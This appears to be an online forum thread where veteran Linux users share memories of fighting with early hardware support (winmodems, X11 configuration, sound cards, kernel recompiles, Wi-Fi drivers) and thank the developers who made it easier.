 - Way back in the mists of time - about 2002, 2003 - I built my own PC (the economics of doing so were borderline then; today it'd be insane). I discovered a problem - one I'm sure virtually every Linux user of the time encountered. Your average motherboard was on the market for 6-9 months, max. It typically took 9-12+ months before Linux supported all the hardware on there. Which meant you'd build your shiny new PC and bits of it simply could not be coaxed into working for the better part of a year. For months, I had no sound and USB was distinctly shaky and unreliable; I was wary of USB in general terms for years after that.

Today, while I use Linux on the server, I don't on the desktop. Gave it up circa 2005. 

Why?

Well, the hardware support has improved no end. But as my requirements for what I want to do with my computer have changed, the user-land software that enables me to do it on Linux has barely shuffled forward in nine years. Granted, the basics are covered, and have become drastically better - Handbrake is streets ahead of anything in 2005, for instance, and LibreOffice is a vast improvement on the early 1.x series of OpenOffice.

But as soon as you step beyond the basics - my God it's like going back in time twenty years.

 - LibreOffice's Access-clone is a barely-usable bug-ridden disaster. (Much like most GUI-driven database applications circa 1997, as it happens).
 - Document scanning is barely possible. (I said document, not image). Virtually every application is based around the idea of a "scan photograph, tweak it"-type workflow; if you want "scan lots of documents, OCR them, turn them into PDFs and put them somewhere indexed so you can find them again later" you basically have to pay $$$ to a commercial organisation whose products are almost invariably Windows-only.
 - The "works for me, if it's such a big problem for you fix it yourself" attitude is quite frankly grating. I accept that I'm getting this software for free, so I have pretty much zero right to complain if it doesn't do what I want. But that cuts both ways - the F/OSS community has zero right to complain if I say "You know what? I've got a better idea. I'm not trying to make an application to do what I want, I'm trying to do what I want. And I can do that dead easy on OS X or Windows. So that's what I'm going to do."

Using free software simply because it does not cost any money has become a religion for many. Maybe it's because I'm getting older, but I don't have the time for that crap any more. I want to play with the photos, not with the application that allows me to play with photos. That's an important distinction.
Tried Redhat for about two weeks back in '95, but couldn't figure out the partitioning (clusters? sectors? dafuq?) Really started around '97 with FreeBSD and didn't see a GUI for 11 months due to shoddy Voodoo3 drivers. Yeah, dialup! AT-commands aplenty!  After that I was using CoreLinux (imagine ArchLinux without pacman) for another couple of years (still just a bash prompt, but I discovered screen, which was nice.)  When wifi became a thing I was suffering through OpenSuse's lack of support for my usb broadcom wifi adaptor, although I finally had X11 working (GUI installer right on the CD! WOW!)

Spent some time dual-booting Ubuntu (Breezy?) and WinXP (Somehow I ended up as a Microsoft Certified Professional.  Don't ask.)

Now it's all gravy with Arch Linux (has it been 5 years?), where the hardest thing I have to worry about is... um... nothing.  Everything just works.

17 years... I've spent just over half my life debugging config files...

You kids have it easy. And suddenly I feel old. GET OFF MY LAWN!
I started last year. I guess I'm spoiled...
Oh, the days of multiple kernel re-compiles just to get a sound and ethernet card working... And when it takes 5 hours to recompile the kernel, you get close to jumping ship.
August 1993 here.

First installed and used Linux on a 486DX2 (66 MHz, 8 MB ram, 200 MB HD) in August 1993 during my freshman orientation at Carnegie Mellon University. 

~7 floppy disk SLS distribution. Kernel version 0.99pl12. Ran NCSA httpd (later became Apache) and hosted one of the first Star Trek fan websites from 1993 to 1995. 10BaseT ethernet connection. SMC 16 bit ISA ethernet card. Also ran X Windows. 

Due to popularity of the Star Trek website I modified the NCSA httpd source code to limit the number of child processes. At that time NCSA httpd had no mechanism to limit server load like Apache does today.

Linux seemed quite stable back then, as long as you didn't rely on less common hardware. The SMC ethernet card helped a lot. I only got kernel panics when I used my sound hardware which was not officially supported. I never got kernel panics or crashes otherwise. 

Linux was my favorite OS from 1993 to 2000. I then favored Windows 2000/XP from 2000 to 2010. Then back to Linux, this time for good.
I'm not as old school as some you gnarly old vets, I first installed Linux in early 2000 I think. Started out with Red Hat but quickly moved to Linux From Scratch because I was a glutton for punishment. Learned a lot, though. Moved to Gentoo in 2001 I think, and volunteered as a developer for a while.

In addition to the never ending battles with video drivers and Winmodem, I actually bought a proprietary, binary Linux driver for my sound card at one point because the OSS driver was completely broken. I can't for the life of me remember what sound card it was for, but maybe I can find a receipt or something in my e-mail archives.
I remember my first installs other Red Hat in 1995.  My god it was painful, but also wonderful once it booted.  I had a Sun Sparc10, a Silicon Graphics Iris (I think) and a Digital UNIX (64 bit!) in the department and the little Red Hat box running on reclaimed hardware did nearly everything the big boys did.  It was fantastic!  Now, almost 20 years later I've got a dozen Raspberry Pi machines scattered around my home and on my public networks not to mention countless virtual Linux installations at work doing all manner of things.  It's such a wonderful OS.  Kudos to the pioneers who made it possible!  You have made my career so much more enjoyable!
Thanks for the recognition :)

I started in 1996 on Slackware 2.1. I spent an entire night trying to configure X-Window. 
Once I finally got it up, I didn't really have any good X-applications installed, but it was great just to get there.


"Hello this is Linus Torvalds, and I pronounce Linux as Linux" popped out of the speakers from that wavefile when we successfully managed to configure the soundcard with OSS (I think it was).

Compiling KDE took 8 hours on my P100, and we often ended up reinstalling and distrohopping just to make the compile process work. We used to say (believe) that RedHat was bad at compiling and Slackware was good at it (based on our experiences it was).

The most exciting was being able to do something better than on Windows (I was never a developer).

We used to just compile and run Enlightenment E16 just to watch how awesome it looked. Launching mpg123 from the transparent E-Terminal (with Digitalblasphemy.com wallpapers on) was pure bliss :D

Pingflooding Windows 95 workstations or the entire broadcast address was also priceless. Unfortunately Win98 had this vulnerability plugged :)

Making the modem dial up was just pure magic. When the magical command to connect the computer to the internet via Point-To-Point WORKED: "ifup ppp0" just amazing science fiction. 
This also went for the even harder to configure and get to work ISDN cards. We had to patch the kernel just to get it up. Eicon Diva rules! 
We had our own share of tools we loved to hate: 

* isapnp, to configure our goddamn PnP peripheral devices. Used to be every ISA card had jumpers, like God intended, but Microsoft and Intel conspired to create cards that required Magic to set up. On top of that, lots of hardware was actually buggy, and their Win95 drivers contained fix-up code to make them actually work.
* xf86setup, a text-based, braindead question script that would ask for all kinds of details about your video card, monitor, mouse, and keyboard, that you probably didn't have.   It would create your xf86config that probably wouldn't work, but maybe you could edit it enough to get a GUI? Of course, if you got it wrong, you probably hard-locked your system.
* "make menuconfig", which still exists, but please don't suggest that anyone still uses it! Like xf86setup, it would ask you flag by flag about the details of your cpu architecture, motherboard features, peripheral devices, and optional kernel features. Life got a lot better when the "menuconfig" target was added, letting you navigate the same questions in a curses-based menu system. Back then, nobody used initrd except installers, and you wanted your kernels as small as possible, as your system probably only had 8 megabytes of memory. If you got your options wrong, your system wouldn't boot, so you better have a fallback kernel as well!
* PLIP, a home-made, budget, point-to-point network interface that ran over your db25 parallel(printer) port. Not everyone could afford "real" network hardware, and serial ports were just too slow. First, you had to make your own PLIP cable, by crossing a few pins from a typical db25-db25 printer cable. Getting it wrong would fry one or both computers, by the way. Then, you would load the PLIP module and configure it much like an Ethernet card. You could only use it with other Linux (and FreeBSD) systems.
* xv, a non-free image viewer with some basic editing capabilities. This was actually a good program, and its shareware license is the only reason it isn't relevant today.
* gpm, mouse support for the LInux console. pointer, select, copy, and paste, all without loading X? Hell yes.
* fvwm95, the window manager that could. A dubious attempt to look/feel like Win95, became the go-to window manager for a lot of distributions. http://fvwm95.sourceforge.net/screenshot-full.gif
* netscape motherfucking navigator. Also, netscape communicator, which included email and newsgroup support.  These programs were terrible, but they were best of class by far. Terrible memory leaks, frequent crashes, and don't forget the "Best Viewed In Netscape Navigator" icon at the bottom of every <table border=1> site!

I could go on, but remembering this nonsense is making me feel old.
2001 here. First tried to get Debian of that era to work without Internet access. That was ... good times. There's still mailing list threads out there. Then I said fuck it, chose SuSE 7.2 Professional out of all the distributions on the planet, and went to CompUSA to buy it. And succeeded.
My first distro was Caldera. When I got a new computer in 1998, it had a USB port, and I wanted to get it to work l. I went on an early Linux forum and asked if anyone knew of any USB suppot that was out yet. The one response I got was "code it yourself". I explained in the most polite way possible that I was still in high school and didnt know how to write code. The response was "not my fault", followed by a thread lock.

I'm just saying, not everyone in those hardware issue years was worthy of thanks.
Hardware?! Psh, I made it through the software revolution! Back around '94 I made the transition from a.out to ELF binaries/kernel without even bricking my workstation. Granted, it took me to weeks of DIP switch fiddling and #define tweaking to get my sound card to work again...
 1994 to 2001 the Win-MODEM years. Never forget.
I remember the horrific font rendering we had to suffer through "back in the day".   You kids.  You don't know how good you have it!

These days are still upon us.  One time I had to install a printer, which froze the machine because the manufacturer - who was cool enough to provide linux drivers - had them named wrong (had spaces).  The printer installer Ubuntu comes with doesn't handle this eventuality,  so I had to dig the background script it was failing on out of syslog, and run it separately with the name fixed.  

What should have been one minute of "plug in printer,  print test page" was 3 hours of fiddling around and finally submitting a bug fix recommendation.

This wasn't  in the late nineties.   This was last week.

..edit fixed a word.
Started to use Linux in 1996 to replace my good old Amiga. First steps were on a beat down 486-66. I had no GUI and to use Linux software that required a GUI, I exported the display to my Amiga, where and X11 client was running. That enabled me to use programs like Netscape.

In 1999, one of my first jobs was to teach a bunch of people about Linux. When I arrived at the office a day before the course started, all computers needed to be set up, as they were all running linux. Actually, all PCs looked the same, but were not exactly the same type. About half of them could not boot into X11 (the graphics card was not supported), but the others had trouble to play back sounds. (Sound was not an issue, I just didn't mention it.)

It was a tough week, seriously. The students weren't too happy about the non-working computers and we couldn't get replacements for them in time. Oh, and it was the first course I held and I wasn't very confident after those hardware problems. But after that, all my courses were kinda great.

I kept using Linux as my sole operating system until 2008, when I switched to a Mac at home, but have been using Linux as my work operating system until 2011, when I relapsed to windows, but Linux is still my go to operating system for anything.
As a Linux user since 1994, you are welcome! ;)
When I started in 2003 I didn't have broadband, and even when I got it distros such as SuSE and Mandrake still had dependency hell, especially if you used a third party repo.

Non-working hardware just had to be expected, mode lines were defined for your resolution and that's assuming your card had some supported driver...if not and you needed a non-vesa resolution then good luck.

My modem didn't work, nVidia drivers broke with almost any significant package update. CPUs didn't scale properly (back when you probably only had two speeds anyway if you were lucky).

Back then you might actually choose your district based on specifics of hardware support. I frequently hopped distros on the promise of some device working better.

It was all worth it, it's all so easy now. I'm another case where my hard earned knowledge has paid off professionally. In my line of work Unix knowledge is a huge add-on.
About 1993 or 94 I had to build kernels on machines I was using in the office because the ethernet device had a slightly out of date list of interrupts for the cards we had then.  Fielding "why Linux?" questions with the reply that I was able to change things that weren't working got some incredulous stares and comments about how it might one day be a "a nice little operating system for hobbyists".

Now all of our core business infrastructure -- servers for mission critical data and desktops for mission critical applications -- runs on RHEL 5 and 6.

I started in 1998....using suse.

But i had to build a new desktop, i had one of the only two motherboards that were not supported, i don't remember why, i guess it was a firmware problem and no update for it.

I remember compiling mplayer for my fantastic matrox g200.
I remember when my Dad gave me a copy of Ubuntu 4.10 from his buddy at work, I threw it onto my old HP Pavilion machine, everything worked...except ethernet! it was an RTL8139 card from Realtek, and everything I could find said it *should* have worked, alas it did not =(

I tried again on a slightly newer Acer laptop a couple years later (I think 6.10?) and ran into no ethernet, Wi-Fi or graphics, damn!

If it wasn't for Windows 7 Beta's release basically being Vista with a different UI (I was one of those insane people that *liked* Vista) I'd have never given Linux another shot. Now I run what I joke with my friends is a "derivative" of Gentoo I've cobbled together.

Whenever my friends want to play a game and they start umming and erring about Hamachi or Tunngle or any of those awful programs, I'm trawling the 'net to find out how to run a server for it on Linux, usually to great success (thanks to whomever worked on [PVPGN](http://pvpgn.berlios.de) back in the day!)
Started using in 1995. I was part of a small internal DevOps (before that term was coined) group for a large energy corporation.  Those were some wild west days.  I was just a jr programmer in awe everyday of the 3 guys forging the way - they were developing a SCADA system that's still in use today.  Gotta give props to mgmt for okaying the project esp in 1995/96 when LINUX was 4 letter word in a corp environment.

Now that I stop and think about it, mgmt probably didnt have a clue about linux, but instead trusted the guys behind the curtain.
I started my journey in 1998-1999 with Red Hat. I remember having to choose between sound and networking, because I was never able to compile a kernel where both worked at the same time.
Since Gutsy Gibbon. (2007?) God, do you have any idea how hard it was to find printer drivers? And, as a beginner, installing OEM drivers was a crash course in frustration.
I started with Slackware in 1997. It took me a month just to figure out how to get dialup working with my University's campus network. First it was modem compatibility problems, then learning how PPP and TCP/IP worked, then writing Expect scripts to do the interactive login.

I was just getting started on my degree in computer science, and our programming assignments were in C++ on Solaris. I had been running Windows 3.11 at the time, my computer didn't meet the specs for Windows 95, I couldn't afford to buy a new computer (poor student, you know) and I wanted to be able to work on the assignments at home. Nobody I knew at the time had ever heard of Linux, but thankfully there was Usenet!

While the rest of my classmates had to stay in the campus lab late every night I was working in the comfort of my own bedroom. ;-)
1997 chiming in. RH 4.2.

I kinda miss the old days of hacking and figuring things out. Yes, I appreciate how easy it is to install Fedora on my machines and have everything recognized, but I still feel nostalgic when I think about editing my xfree86 config file for the right resolution and refresh rate.  I don't want those days again, but I can say hey were adventurous. You all missed out on a hectic journey. AT towers, jumpers, Cyrix chips....man was that fun!
This is funny to me considering I spent 10 hours yesterday fighting with Mint and then Ubuntu to get the ethernet and wi-fi working on my wife's old (former) xp laptop.
'94. Only hardware struggle I remember early on was X. First I had to upgrade my 4 mb of ram to 16. I bought it over usenet. [Edit: For something like $200] Had to cancel my first check after rumors that seller was mailing out bricks. Then had to edit Xfree86.conf and guess at refresh rate numbers. Word had it that the wrong guesses could blow up your monitor.

But after that, everything just worked, including my soundblaster card and serial mouse, and ethernet card on the university broadband. Even got the wyse dumb terminals I had scrounged up connected and was really pleased to have a unix system that could properly drive them, unlike windows where they were nearly useless.

Newer hardware has had many more issues: winmodems, wifi needing proprietary firmware, graphics needing binary drivers, etc.
1997 or something like that here. I installed slackware the first thing I did. It was fucking horrible!

It's all good now though.
Started with Red Hat in 1999, and I guess that I don't really remember having that much trouble apart from winmodems and having a little trouble with getting X to play nice with my then new Radeon card. Everything since then has been at most a minor annoyance.
Gentoo user in 2003. I wanted to learn linux and be familiar with open source build environments before I went off to college.

I heard Gentoo was notoriously difficult, but it also had some of the best documentation explaining every part of building a custom linux distro. So I printed that manual, like 50 pages of really small text, and did my best. I think it was two weeks before I had an acceptable install with fluxbox, working audio, and a working wifi connection. I basically was constantly reading forums and asking questions.

Now... it's just so much easier for hardware support. Even more so than Windows. I still run Gentoo for servers, but I've moved onto debian based distros for the excellent amount of package support.
I started fooling around with Linux sometime in the early 2000's, using a ragtag fleet of old laptops and desktops that I'd scrounge from one source or other. As others have mentioned, Linux did better on older hardware since there was more time for it to permeate through the community.

I remember sometime, I'd gotten my hands on some ancient Pentium II box, and I decided to give Gentoo a try. I didn't want to use those silly "booster packs" or whatever they might have called them, were you get a bit of a time savings. I wanted to do it "the right way", starting from the source code and going from there. It took the entire weekend to compile, but it WORKED. The documentation from the Gentoo folks was spectacular at getting the thing to work. 

I've also played around with Debian, CentOS, and quite a few Ubuntu variants. I can recall the first time I got full motion video AND sound going -- I ran upstairs to show it to my wife, who was a little less excited than I would have hoped, since her machine had been doing that for a long time already :)

It is amazing how far along things have come. I recently set up a netbook I had lying around with Xubuntu, and most stuff worked flawlessly from the get-go, with only very minor tweaks being required to get it fully operational. I only had to do one thing in the terminal, and didn't need to chmod anything, edit xorg.conf, etc.

I run Debian at work (it's our company standard), and listen to Spotify while working, run Chrome, VMWare Player and numerous other popular applications. I've tried to convince my wife to come over when she's gotten malware, but she sure is tied to her Windows! And I don't push too hard, since you know, happy wife = happy life :)

One time at the end of the 90's I asked a friend to drive over so he could help me get my linux partition to recognize my modem. He was running really late when I got a knock on my door, said friend was out of breath and had run up to my house from down the street where he almost went off a cliff after dodging a deer. I kept a piece of his headlight in my room for years.

Anyway, yeah, it was rough getting stuff to work back then. I eventually set up a linux firewall/router with a modem I knew to work and just plugged it into a switch. If the hardware incompatibilities didn't get you, the dependencies would :) 
Got my first exposure to /UnixLinux in 1990. It was the Naval Intelligence Processing System or NIPS and man, could it plot the location of every vessel in the ocean and in pretty colors quickly. It came with these Gigantic monitors at the time. They were 19" Sun CRT's and took up a whole desk. I've been using Unix/Linux ever since. 
About 15 years here.  Started in middle school for fun.  

Although my laptop is about three years old, it definitely didn't work OOB when I upgraded to the latest Ubuntu a few months ago (after like two years of not doing so).  There are a few things broken that worked fine with the older version (without my intervention).

To be honest I don't see much better results from fresh installs than when I started, and it seems harder to get them to work.  For a quick example, trying to get video cards and monitors to work used to be a matter or editing xorg.conf.  Sound cards, too, would take maybe an installation and some text file editing.  OTOH, I finally gave up on the new version of Ubuntu I recently installed when I couldn't figure out how to get sound to work.  

But there is a lot of hardware now that's supported that never used to be, for sure.  When wifi started to take off, it seemed like every card required some kind of new hack to get it working, and before buying any you had to scounge the internet first to see if it was possible and how hard it would be.  Wifi drivers, for one, have definitely come a long way.
As a 6-year user of Linux, I too salute all of you who have contributed to making Linux what it is today. 
Conversely this is how I know things are VASTLY better.

20 years ago you needed slackware or red-hat and a prayer, SCO was a venerable and relatively easy to install variatnt of OS. 

Linux as such really turned a corner in say the mid 1990's and it was demonstrably better than many other OS comparitively, but the nightmare of installation awaited anyone still.

Really between Debian, Red-Hat and especially (for better or worse) Cannonical, you got an OS so easy to install children can do it without any necessary knowledge of what bedeviled us just a few short years ago.


I started in 1997 as a 12 year old. I think the worst lessons to learn were getting X configured. Also, learning that a winmodem would simply never be able to dial up. It really has come a long way. I'm glad I started back then, other wise I wouldn't be a SysAdmin today. 
I bailed when my new desktop computer had the weird new BIOS things so I couldn't dual-install safely. Someday I'll try again, when the pros have made an easier method, or when I get a different machine.
I began my journey with Linux in earnest in 1996 with the release of Red Hat Commercial Linux 4.0.

It worked mostly... I had a 386DX and all the daughtercards were ISA bus. Sound was a challenge because my awesome Gravis Ultrasound was not so awesome without working drivers. X was a distant enigma as I didn't even consider a GUI as I was coming straight from MSDOS.  My external serial modern worked too so I could access BBSs...

Now... A few months later my shiny new Pentium would prove to be a whole other story...
Oh those days struggling with Speedtouch 330 ADSL modem.. Without normal eth router Linux was pain in the ass those days.

Remember how build Gentoo base took like 48h, FreeBSD world for 3 days. That was fun actually. Now it's boring. Just works ;)
Hear hear.

I started in 2009 with Ubuntu 9.10. I installed it via Wubi and got so excited when I first saw it boot up on my enormous laptop. Since then I have been playing with it off and on until I built my own machine and it has been my primary OS for the better part of a year.

I now use it in work too as the 'linux' guy. 
\*tips fedora\*
Gentoo amd64 user, first installed late 2004 here.  Nothing but Linux on any of my own PCs since mid 2005 (two desktops and three laptops between then and now).

First install was over dialup.  If you can believe it, I think it took more time to download everything to get a running X/KDE system than it did to compile it (I had an Athlon64 2.something GHz at the time).

I always stuck to nvidia in those days so at least the ATI driver issue was avoided, I know it's a lot better these days but mid-2000's ATI users were not having a fun time of it.

One of my all-time favourite issues was a kernel bug from 2005-ish (2.6.9, 2.6.12, somewhere around there), where connecting a PPP device would break your PS/2 keyboard (only on amd64, as I recall).  Fortunately since not long after that I've never again had to use dialup.  I still have it (found it just now in a box in the attic), [the last 56k modem I ever owned](https://i.imgur.com/rRs0RjP.jpg) - as /u/punkrockmcduck says about the external USR modem, you simply could not beat hardware serial (this one just found itself the next available /dev/ttyS* device, no additional drivers required).

Other than that, I've lived through

* Ongoing issues with sketchy hotplug support on Wacom tablets (but I do thank the dedicated Wacom employees who ensure they do at least work at all, I'd just be a mess of RSI symptoms without mine).
* Kernel panics with my USB network adapters (ax88179_178a), that one was recent, 3.13.
* Dodgy Winmodem years (until I got the above USR5610B).
* Early days of Linux WiFi, so many devices pre-dating standardised APIs (and even some post-standards that didn't use the standards, I'm looking at you, ra-link).

I'd be lying if I said it had been easy, but it's definitely right to say that things now work better than they ever had.  It's not necessarily a bad thing that new users will probably never have write an xorg.conf, build their own kernel to fix some obscure bug, or spend three hours searching online for some half-arsed reverse-engineeered driver to make a piece of hardware work.
Was a Debian user since slink. I knew X11 config gotchas and could identify a winmodem from a real modem. Once I installed over a parallel port interface.
Sometime around 1999 I switched from redhat to Slackware as the latter had somewhat working graphics drivers (mind that at that time the private Internet in Austria was around 1mbyte/hour billed at around $1 - $2) so getting new releases was kinda tedious. Then came months of fvwm 1+2 configuration hacking.
Oh, man! Started in 1996 with Debian Buzz. It was the time when you had to dig out your hardware manuals and try and work out the vertical refresh of your CRT. I still couldn't get a graphic desktop going. Finally I called on a neighbour who taught operating systems at the local University. He edited the XFree86 (?) config file by hand in vi.

I invited him to wine and cheesy biscuits afterwards and went on to edit Linux Magazine Spain.

Edit: I also remember my first article written completely on Linux... using Corel WordPerfect something (can't remember the version number... 8? 10?). I was so proud.
I started using Linux in 2006 and I feel like I could have given the same thanks then. Things have "just worked" on common hardware for a long time. (Except installling on fakeRAIDs, though it's gotten a lot better, but I've come to accept it's my own fault for using fakeRAIDs, and SSDs have made that moot.)

In fact, since Vista, I suspect Linux has overtaken Windoze in hardware compatibility. There are always a few gaps, but every OS has them.
Haha.  Way back in the day everthing sucked, given.  But after that, back in the day you used Red Hat and shut the fuck up.  Or back in the day you didn't run Red Hat but complained a lot about bullshit like RPM hell, whilst never realizing front ends for RPM were available.

It still makes no sense.  But it sorta makes sense? Linux users need a Microsoft to hate even after completely breaking off from Microsoft?  So yeah, nevermind all that Red Hat does for the open source community?  They're evil because, *gasp*, they include some sane default configurations and GUI tools and whatnot.

Fuck, the hardest part about sticking with Linux even still?  Now you have to deal with assholes, even assholes like me and whatnot.
I remember back when I first started with linux in 06/07 the absolutely tremendous struggles trying to get various USB wireless adapters to work, having no idea what ndiswrapper was, and having to scour the forums to get stuff to work. Its kinda like arch linux, getting hands on helps you to learn. All of these issues are just part and parcel of the learning curve that leads us to a working knowledge of linux. Now I can just pop in the CD/DVD/USB and be pretty confident of a 100% working system.

In fact, my samson go mic just arrived, I plugged it in, and its working out of the box.
I came late to the bug-hunting party (2002), and I never understood why some of the tips were rarely given. For example, using the VESA driver gave you a much more comfortable way to configure your system until you got the proper video driver working…
You are welcome. It was elating and nerve-wracking.
Here since 07 jesus I didn't realise it was 7 years already. I should do something for my 10th anniversary like give away some games or something. 
I don't have any stories of perseverance, I've been using Linux  primarily since about 2011. However, I do remember my dad trying to get me to use FreeBSD. 

This was back when it was easier to have a pack of CDs sent to your house every major release than attempt to download it.

He took me to a few *Nix user group meetings, but I was like ten, so it was more hang out with dad than me understanding what they were talking about.

That's pretty much my early memories of being exposed to Linux and BSD. 
Since 1995. You are welcome? :]
I installed OpenCaldera in 2000 on an ATI Rage.

Never did get X working, it set me back 4 years. I didn't try Linux again until 2003.

I rarely mess with hardware, I use Ubuntu which generally "just works".

So thanks everyone!
I first started using Linux around 1999-2000 with Red Hat.  I could never get sound working with my soundcard.  However the worst bug, was a friend and I decided we'd give Linux a whirl for our comp sci work.  I had an Abit nforce2 board, he had an Asus nforce2 board.  We needed to use a beta version of Mandrake to support our motherboards.  Well turned out there was this bug where the installer would corrupt his MBR.  The only way to fix it was to manually overwrite the MBR with 0's, not even doing a windows or another Linux distro install would give you a bootable system.  The bug was isolated to his mother board, not mine.  Probably why I have hence switched to Linux now, and he hasn't. 
Off and on since 1999, including about 2 years where I used ot for everything except tax software that was only available for Windows. But it was too much work for me at the time.

Has Broadcom ever release wifi drivers for their chips or is it still necessary to cut out the windows driver and embed it in the linux one? Or hunt for someone that built a wifi card with atheros.

It's stuff like that which made it too much for me. I am too intellectually lazy after 50+ hours at work each week to deal with that.


Linux user since 2004 checking in. Things are so much better nowadays. That's for sure.
1999: My preference for Red Hat is cemented as it's the only distro that will actually install on the hard drive I had. (That and it's the home town distro.)
I remember getting Redhat CDs from a sketchy bootlegger dude because I couldn't download all that :) 
I tried Mandrake back in 03.  I had no idea what I was doing.  I installed redhat on some old machine a while after that, but still didn't know what the hell I was doing.  I was just a windows power user then trying to figure things out. It was foreign to me, so I gave up on it pretty quickly.

For a while I had Fedora installed on my laptop, but never did anything with it.  It was just there.

Ubuntu 6.06 was the first distro I actually started to use as my primary OS.  The worst I ever had to put up with was ndis wrappers, synaptics drivers being wonky or not working, and occasionally having to fiddle with xorg.conf.  I was also an early adopter of 64-bit machines, so lots of annoyances with that.
Sound cards, X11, and Winmodems, oh my... When I got my first dial up modem working it was indeed a small miracle... Oh and don't get me started on early broadcom WiFi cards and the days spent getting one working.
Tip your red hat!
XFree86 modelines and XF86Config in general... fun times :(

Also, I doubt most build their own kernel anymore, but it was standard practice back then.  The documentation I started with referenced 'make config', not menuconfig, xconfig, or anything fancy.  One typo and you're screwed.





I remember getting my first computer from Computer City (sold to CompUSA in '98 and liquidated). I had trouble installing Red Hat Linux 5.0. Back then, the installation wasn't all that fancy or informative. It kept stopping at the screen where I was to select my SCSI card. I couldn't figure out why it kept taking me back to this screen. Turned out the guy who sold me the computer didn't know it already included a SCSI card, so they sold me a 2nd SCSI card to run my scanner (unbeknownst to me). I ended up taking the machine back and they discovered the issue. No refund, though. I ended up getting Red Hat Linux 5.1 installed later the next year.
I'm pretty sure many of them enjoyed it.  Some people just love tinkering.
It's ironic that Now people use linux when windows won't detect their hardware!

user since mid-2000's  it aint that bad because we used computers for so much less back then. Just searching things on hotbot. 
As a linux (starting with SLS linux) veteran who spent countless hours in 1993 getting the cdrom, video driver code to work.. You are welcome. 
I love Linux and have been using it it various forms since the mid 90's. It has been a long road, but every challenge has been met. Open Source for the WIN!
The Linux desktop of 2007 was absolute hell. Out-of-box wifi support was not a given like it is today. Ndiswrapper made me gag. 

There were also crazy things like UMS/EXA/UXA and radeonhd.
Here here! 
Are you saying you tip your "Fedora" ?
1997 here, there were definitely some rough times. 

x11, softmodems, ppp0 interfaces, sound cards... Oh my, so many terrible memories. 

edit: Oh just had some more flashbacks... Software repository? Ha! We used to have to go to freshmeat or sf and find stuff that maybe worked.
Started with Slackware 4 back in 1999. I was lucky enough not to have any hardware issues until I got a laptop in 2003 and it had a broadcom NIC. I do have some mostly-repressed memories of manually configuring XFree86 for dual monitors, though.

I've also been lucky enough never to have had to try to use dial-up in Linux.
I'm not very "old school", but my first experience was back in 2007-2008 when my laptop crashed and I remember biking to the library and finding linux disks in the back of the "for dummies" books. They were already really old by that time, but I remember installing really early Fedora distros, as well as Red Hat
I still remember static dev files. xfree86 sucked back in the day and a kernel compile took so long!
My story. I was at a big stadium computer hardware sale back in 89/90 and found a really inexpensive CD drive (a really fast 1X model). Thought cool, I'll run it on Linux. But wait, it's SCSI so, I'll stop by the computer store and grab a SCSI controller on the way home. At the computer store, I discovered SCSI controllers are more expensive than the drive. Hell, most were more expensive than my whole computer. Was looking around the store and came across the COREL software SCSI driver because I was going to use it on Windows also. I grabbed the box and was reading on the back and lo and behold, it comes with a card. Well, I couldn't buy it fast enough. Got it home and found that it did not work on Linux. Well, damn it, I am a software engineer, time to prove it. It took some research and I was lucky enough to be working at a place that had access to many hardware data sheets so I could get all the information required. I ended up writing my own driver and releasing it. That was the most exciting thing I have done in Linux. BTW, CD Drive was supported so once the SCSI driver worked, the drive was found immediately. 

Edit: Oh, and because of the driver, I was offered a chance to buy into the RedHat IPO by RedHat. And I can still search for my driver on Google and find it. Also, I was written up in a couple of books on Linux back in the day. 

TL;DR Bought cheap SCSI CD drive and cheap card.  Had to write driver to make it work.  
Ohh, yes, you have my deepest respects. 
I started using Linux very recently (since September in my school, installed a dual boot at home this week), and when I see all the troubles I'm getting to have something working, I fear I can't imagine how hard it was to have a proper setup 20 years ago or so. 
Many thanks to y'all 
You're welcome. :)

hell I started in 2010 (not saying I am one of those people OP mentioned) and no fiddle hardware support has increased a lot since then, but then again I was working with a computer with Broadcom hardware.
I remember my first linux distro was Ubuntu Intrepid Ibex (8.10 IIRC).  It took me 3 months to figure out why the linux drivers wouldn't support my laptop's native resolution.  The state of open source drivers has grown incredibly.  Since those humble beginnings in when i was still in highschool, linux has become the mainstay of my career.  I'm proud to say that I found my home in a shell.  
I started in 2007 with Ubuntu 7.10 and even from there we've advanced significantly. Kudos to all the awesome Devs out there!
For real. When I started with Linux, I spent days picking compatible hardware, but that was when you could pick compatible hardware. I can't imagine how hard it was at first and with no online resources like today. 
I changed 2003, and did so out of pain with Windows related stuff. My Windowshunch is much smaller now (Windows 7), but once you used Linux on a daily base and have some scripts doing work for you, there isn't much reason to go back. 
Linux is so much easier than Windows for me now, it's incredible- thank you!
I've been a user since 1998. I got excited when I saw screenshots of Red Hat 5.2 running Gnome and KDE. 
Since 1998 here! I do not miss recompiling kernel modules etc. etc. just to get sound to work.
You guys should do embedded development, making custom and unsupported hardware run with Linux is still a massive headache!
Started in 2003 with slackware, I had a lot of fun installing and compiling kernels to get my dsl modem working at the times. Despite having to use windows at work I always kept a linux machine at home to host game servers for fun. I worked with redhat in a small company and installed debian on many virutal machines. I now use arch on my laptop to work and i love i3wm, but I keep a windows machine so I can help neightbours who are more used to that.
Ah the good old Debian, I fell in love in '96 and still use the offspring (Ubuntu for those not really following that archaic stuff :) didn't even realize it's been so many years.
Oh my teen ages @ 97 spending 1 week setting gpm on debian... tears
Started in the early 2000s with a copy of RedHat 5.2 (better than Windows 3.1, which was my other OS at the time). Progressed through Fedora (stated at core 1) and Ubuntu (started at 6.04). Now I'm an unemployed Linux admin that works on Fedora's infrastructure team. So yeah. Fun stuff.

Does it strike anyone as odd that even now there are still only 3 choices of operating systems available to anyone? Maybe more like two, inasmuch as Linux and  Apple are both Unix based. BSD and Gnu seem to be Linux with an accent, more or less.
I remember having to figure out how to mount fat32 to putt the conextant modem drivers over onto my linux install so I could connect to the internet on my linux install back in 2002.  Eventually got an external hardware modem because winmodems suuuucked.

simpler times.
Been fucking around since BEos failed. Red hatted, saw the first graphical installer...wept many tears and raged many rages.
I've been running Linux since '99 and haven't had too many serious hardware problems, but I've always researched anything I buy for Linux compatibility pretty thoroughly. I've submitted a few bug reports here and there but don't feel I can take much credit for anything.
i started using linux (with ubuntu) back in 2007. never had any issues with hardware. guess i've been just lucky and a newcomer compared to most of you who started back in 1994.
I've been involved since maybe 1992(?). Still pulling floppy images off ftp sites. Lots of fun (seriously). Ported a couple of tools early on, but got sidetracked by life. Remember booting 0.12. Sigh... Memories :-)
95 here. Running it on a 486sx and 4mb of ram. Video was shit and the modem never worked. Glad I can just boot from a thumb drive now and have a working system in less than an hour
Since 1998 here. I download Slackware 4 in high school with a crap ton of floppies
